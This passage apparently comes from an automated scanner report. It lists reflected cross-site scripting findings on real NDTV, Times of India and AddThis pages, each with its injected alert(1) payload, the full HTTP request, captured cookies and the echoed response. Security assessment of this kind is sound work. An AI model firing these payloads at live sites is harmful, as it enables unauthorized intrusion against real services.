Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14413
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
var BASE_URL = "http://social.ndtv.com";
var CDN_URL = "";
var cookie_name = 'http://www.ndtv.com/article/india/48-hours-on-mumbai-airport-s-main-runway-still-shut-13114284f35';alert(1)//3ee7c09651';
</script>
...[SNIP]...

6.165. http://social.ndtv.com/static/Comment/Form/ [link parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/static/Comment/Form/

Issue detail

The value of the link request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85b5"><script>alert(1)</script>77bb187e5d6 was submitted in the link parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142c85b5"><script>alert(1)</script>77bb187e5d6&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14461
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="page_url" value="http://www.ndtv.com/article/india/48-hours-on-mumbai-airport-s-main-runway-still-shut-131142c85b5"><script>alert(1)</script>77bb187e5d6"/>
...[SNIP]...

6.166. http://social.ndtv.com/static/Comment/Form/ [title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/static/Comment/Form/

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e0d0"><script>alert(1)</script>f379e313f95 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut8e0d0"><script>alert(1)</script>f379e313f95&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14419
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="hidden" name="page_title" value="48 hours on, Mumbai airport's main runway still shut8e0d0"><script>alert(1)</script>f379e313f95" />
...[SNIP]...

6.167. http://social.ndtv.com/static/Comment/Form/ [title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/static/Comment/Form/

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9e9d</script><script>alert(1)</script>e66a05d579 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shute9e9d</script><script>alert(1)</script>e66a05d579&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14430
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:43:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
= '&link=' + 'http://www.ndtv.com/article/india/48-hours-on-mumbai-airport-s-main-runway-still-shut-131142';
params += '&title=' + '48 hours on, Mumbai airport\'s main runway still shute9e9d</script><script>alert(1)</script>e66a05d579';
params += '&identifier=' + 'story-131142';
params += '&ctype=' + 'story';
params += '&site=' + 'ndtv';

if(!o.cache){

...[SNIP]...

6.168. http://social.ndtv.com/tbModel/comments.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social.ndtv.com
Path:	/tbModel/comments.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f53"><script>alert(1)</script>dbef8475859 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tbModel/comments.php?50f53"><script>alert(1)</script>dbef8475859=1 HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Sun, 04 Sep 2011 04:21:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:21:27 GMT
Content-Length: 9450
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a href="/tbModel/comments.php?page=2&50f53"><script>alert(1)</script>dbef8475859=1">
...[SNIP]...

6.169. http://timesofindia.indiatimes.com/topic/Xss [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://timesofindia.indiatimes.com
Path:	/topic/Xss

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 400fa"%3b62b9b70133a was submitted in the REST URL parameter 2. This input was echoed as 400fa";62b9b70133a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /topic/Xss400fa"%3b62b9b70133a HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih; _iibeat_session=02f2ca4f-6c90-4fc2-993c-84fedfef7948; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.5.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); topic_visit1=Xss; RMFW=011R02Wt7108ni; _chartbeat2=8l1yir8xsllibs89

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 03:40:40 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 30700
Expires: Sun, 04 Sep 2011 05:30:40 GMT
Date: Sun, 04 Sep 2011 03:41:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" ><html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="text/html; char
...[SNIP]...
<script language="JavaScript">var searchvel = "Xss400fa";62b9b70133a";
   function GetParam(name)
   {
       var match = new RegExp('[\?&]'+name+"=([^&]+)","i").exec(location.search);
       if (match==null)
           return null;
       else
           return decodeURIComponent(match[1]).replace(/
...[SNIP]...

6.170. http://www.addthis.com/api/nai/optout [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d302<script>alert(1)</script>40b48eadfe5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api5d302<script>alert(1)</script>40b48eadfe5/nai/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api5d302<script>alert(1)</script>40b48eadfe5/nai/optout?nocache=0.8710141</strong>
...[SNIP]...

6.171. http://www.addthis.com/api/nai/optout [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7874"-alert(1)-"0e5a911a5e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /apie7874"-alert(1)-"0e5a911a5e8/nai/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/apie7874"-alert(1)-"0e5a911a5e8/nai/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.172. http://www.addthis.com/api/nai/optout [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a45d"-alert(1)-"f304ccb4a0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /api/nai2a45d"-alert(1)-"f304ccb4a0e/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai2a45d"-alert(1)-"f304ccb4a0e/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.173. http://www.addthis.com/api/nai/optout [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9a7f4<script>alert(1)</script>0409d681e46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai9a7f4<script>alert(1)</script>0409d681e46/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:14:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai9a7f4<script>alert(1)</script>0409d681e46/optout?nocache=0.8710141</strong>
...[SNIP]...

6.174. http://www.addthis.com/api/nai/optout [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f8d1<script>alert(1)</script>1877ca655c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/optout8f8d1<script>alert(1)</script>1877ca655c6?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:15:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/optout8f8d1<script>alert(1)</script>1877ca655c6?nocache=0.8710141</strong>
...[SNIP]...

6.175. http://www.addthis.com/api/nai/optout [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a7c1"-alert(1)-"581a1ca5be1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /api/nai/optout9a7c1"-alert(1)-"581a1ca5be1?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:15:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/optout9a7c1"-alert(1)-"581a1ca5be1";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.176. http://www.addthis.com/api/nai/status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1eb37<script>alert(1)</script>c896db9bd8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api1eb37<script>alert(1)</script>c896db9bd8b/nai/status?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api1eb37<script>alert(1)</script>c896db9bd8b/nai/status?nocache=0.2280698</strong>
...[SNIP]...

6.177. http://www.addthis.com/api/nai/status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b37c"-alert(1)-"14aad95f105 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /api7b37c"-alert(1)-"14aad95f105/nai/status?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api7b37c"-alert(1)-"14aad95f105/nai/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.178. http://www.addthis.com/api/nai/status [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 942a7<script>alert(1)</script>435b8dfe5d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai942a7<script>alert(1)</script>435b8dfe5d3/status?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
